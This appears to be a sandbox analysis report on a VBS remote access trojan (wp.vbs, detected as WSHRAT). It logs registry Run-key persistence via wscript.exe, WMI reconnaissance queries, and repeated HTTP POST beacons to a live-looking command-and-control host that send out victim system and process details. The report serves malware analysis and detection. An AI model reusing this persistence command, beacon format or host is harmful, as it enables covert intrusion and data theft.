reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\wp	reg_value	wscript.exe //B "C:\Users\test22\AppData\Local\Temp\wp.vbs"

Executes one or more WMI queries (4 events)

wmi	select * from antivirusproduct
wmi	select * from win32_process
wmi	select * from win32_operatingsystem
wmi	select * from win32_logicaldisk

wscript.exe-based dropper (JScript, VBS) (21 events)

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (50 out of 105 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW Dec. 14, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Dec. 14, 2023, 10:12 a.m.	buffer: ! socket: 988 sent: 1	1	1
send Dec. 14, 2023, 10:12 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2023-12-14\|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1080 sent: 324	1	324
send Dec. 14, 2023, 10:12 a.m.	buffer: ! socket: 988 sent: 1	1	1
InternetCrackUrlW Dec. 14, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Dec. 14, 2023, 10:12 a.m.	buffer: ! socket: 988 sent: 1	1	1
send Dec. 14, 2023, 10:12 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2023-12-14\|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1104 sent: 324	1	324
send Dec. 14, 2023, 10:12 a.m.	buffer: ! socket: 988 sent: 1	1	1
InternetCrackUrlW Dec. 14, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Dec. 14, 2023, 10:12 a.m.	buffer: ! socket: 988 sent: 1	1	1
send Dec. 14, 2023, 10:12 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2023-12-14\|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1112 sent: 324	1	324
send Dec. 14, 2023, 10:12 a.m.	buffer: ! socket: 988 sent: 1	1	1
InternetCrackUrlW Dec. 14, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Dec. 14, 2023, 10:12 a.m.	buffer: ! socket: 988 sent: 1	1	1
send Dec. 14, 2023, 10:12 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2023-12-14\|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1108 sent: 324	1	324
send Dec. 14, 2023, 10:12 a.m.	buffer: ! socket: 988 sent: 1	1	1
InternetCrackUrlW Dec. 14, 2023, 10:12 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:12 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Dec. 14, 2023, 10:12 a.m.	buffer: ! socket: 988 sent: 1	1	1
send Dec. 14, 2023, 10:12 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2023-12-14\|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1096 sent: 324	1	324
send Dec. 14, 2023, 10:12 a.m.	buffer: ! socket: 988 sent: 1	1	1
InternetCrackUrlW Dec. 14, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Dec. 14, 2023, 10:13 a.m.	buffer: ! socket: 988 sent: 1	1	1
send Dec. 14, 2023, 10:13 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2023-12-14\|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1096 sent: 324	1	324
send Dec. 14, 2023, 10:13 a.m.	buffer: ! socket: 988 sent: 1	1	1
InternetCrackUrlW Dec. 14, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-processes flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-processes	1	13369356
send Dec. 14, 2023, 10:13 a.m.	buffer: ! socket: 988 sent: 1	1	1
send Dec. 14, 2023, 10:13 a.m.	buffer: POST /is-processes HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2023-12-14\|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 1465 Connection: Keep-Alive Cache-Control: no-cache socket: 1112 sent: 331	1	331
send Dec. 14, 2023, 10:13 a.m.	buffer: ! socket: 988 sent: 1	1	1
InternetCrackUrlW Dec. 14, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Dec. 14, 2023, 10:13 a.m.	buffer: ! socket: 988 sent: 1	1	1
send Dec. 14, 2023, 10:13 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2023-12-14\|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1212 sent: 324	1	324
send Dec. 14, 2023, 10:13 a.m.	buffer: ! socket: 988 sent: 1	1	1
InternetCrackUrlW Dec. 14, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Dec. 14, 2023, 10:13 a.m.	buffer: ! socket: 988 sent: 1	1	1
send Dec. 14, 2023, 10:13 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2023-12-14\|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1216 sent: 324	1	324
send Dec. 14, 2023, 10:13 a.m.	buffer: ! socket: 988 sent: 1	1	1
InternetCrackUrlW Dec. 14, 2023, 10:13 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Dec. 14, 2023, 10:13 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Dec. 14, 2023, 10:13 a.m.	buffer: ! socket: 988 sent: 1	1	1
send Dec. 14, 2023, 10:13 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 2023-12-14\|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1104 sent: 324	1	324
send Dec. 14, 2023, 10:13 a.m.	buffer: ! socket: 988 sent: 1	1	1

File has been identified by 29 AntiVirus engines on VirusTotal as malicious (29 events)

FireEye	VB:Trojan.Valyria.4537
Skyhigh	VBS/Agent.dy
ALYac	VB:Trojan.Valyria.4537
VIPRE	VB:Trojan.Valyria.4537
Sangfor	Malware.Generic-VBS.Save.d63cbaa2
Symantec	VBS.Heur.SNIC
ESET-NOD32	VBS/Agent.OXW
Avast	JS:Skiddo-A [Trj]
Cynet	Malicious (score: 99)
Kaspersky	Trojan.VBS.Agent.bdq
BitDefender	VB:Trojan.Valyria.4537
NANO-Antivirus	Trojan.Script.Agent.iwquii
MicroWorld-eScan	VB:Trojan.Valyria.4537
Emsisoft	VB:Trojan.Valyria.4537 (B)
F-Secure	Malware.VBS/Dldr.Agent.VPTL
DrWeb	VBS.Siggen.8176
Sophos	VBS/DwnLdr-ACDC
Ikarus	Trojan-Downloader.VBS.Agent
Google	Detected
Avira	VBS/Dldr.Agent.VPTL
Arcabit	VB:Trojan.Valyria.D11B9
ZoneAlarm	Trojan.VBS.Agent.bdq
GData	VB:Trojan.Valyria.4537
Varist	VBS/Dunihi.A
McAfee	VBS/Agent.dy
MAX	malware (ai score=85)
Rising	Trojan.Agent/VBS!8.11E09 (TOPIS:E0:xxVsk5TjtcJ)
Fortinet	VBS/Agent.OXW!tr
AVG	JS:Skiddo-A [Trj]

wp.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All